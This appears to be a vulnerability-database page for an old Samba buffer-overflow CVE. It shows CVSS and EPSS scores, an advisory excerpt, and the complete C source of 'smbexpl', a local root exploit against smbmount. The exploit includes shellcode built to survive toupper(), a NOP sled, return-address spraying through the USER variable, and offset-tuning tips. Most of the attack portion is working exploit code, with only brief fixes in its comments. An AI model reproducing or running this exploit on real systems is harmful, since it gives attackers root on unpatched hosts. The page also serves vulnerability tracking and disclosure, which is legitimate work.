CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Buffer overflow in Samba smbd program via a malformed message command.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
6.79%
–
–
2022-04-03
–
–
6.79%
–
–
2022-05-22
–
–
6.79%
–
–
2023-03-12
–
–
–
1.72%
–
2024-01-21
–
–
–
1.72%
–
2024-02-11
–
–
–
0.24%
–
2024-06-02
–
–
–
0.24%
–
2024-11-24
–
–
–
0.24%
–
2024-12-22
–
–
–
0.24%
–
2025-01-12
–
–
–
0.24%
–
2025-01-19
–
–
–
0.24%
–
2025-03-18
–
–
–
–
3.43%
2025-03-30
–
–
–
–
3.43%
2025-04-15
–
–
–
–
3.43%
2025-04-15
–
–
–
–
3.43,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
/*
source: https://www.securityfocus.com/bid/536/info
There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default).
*/
/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/
/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME. To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case). The user will need to create
** the ./a directory and then execute smbexpl to gain root. This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable. Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
** chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/
#include <stdlib.h>
#include <stdio.h>
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper() */
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int alignment=DEFAULT_ALIGNMENT;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) alignment = atoi(argv[3]);
printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
fprintf(stderr,"Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) (ptr+alignment);
for (i = 0; i < bsize-alignment; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + (128 - strlen(shellcode));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("USER",buff,1);
execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}